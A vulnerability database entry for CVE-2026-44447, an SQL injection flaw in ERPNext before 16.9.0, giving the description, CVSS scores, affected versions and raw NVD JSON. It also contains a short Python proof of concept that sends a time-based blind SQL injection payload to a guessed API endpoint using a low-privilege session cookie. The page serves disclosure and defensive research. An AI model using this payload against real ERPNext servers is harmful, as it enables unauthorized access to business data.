Security Vulnerability Report
中文
CVE-2026-44447 CVSS 8.8 HIGH

CVE-2026-44447

Published: 2026-05-13 22:16:46
Last Modified: 2026-05-14 19:41:12

Description

ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 16.9.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 16.9.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* - VULNERABLE
ERPNext < 16.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # ERPNext SQL Injection PoC Concept # Target: ERPNext < 16.9.0 # Description: Sending a malicious payload to a vulnerable endpoint. target_url = "http://target-erpnext.com/api/resource/SomeResource" # Replace with actual endpoint # Example payload for time-based blind SQL injection # This payload attempts to cause a delay if the database is vulnerable payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -" # Cookies representing a low-privilege user session cookies = { "sid": "low_privilege_session_id_here" } params = { "filters": payload # Assuming the vulnerable parameter is 'filters' } try: print(f"[*] Sending payload to {target_url}...") response = requests.get(target_url, params=params, cookies=cookies, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Response delayed by database sleep.") else: print("[-] Vulnerability not detected or patched.") except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44447", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:45.780", "lastModified": "2026-05-14T19:41:12.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 16.9.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 16.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.9.0", "matchCriteriaId": "C4A060FB-CAB5-454F-8536-C205C527E0BD"}]}]}], "references": [{"url": "https://github.com/frappe/erpnext/security/advisories/GHSA-q65v-fm9p-9vh3", "source": "[email protected]", "tags": ["VDB Entry"]}]}}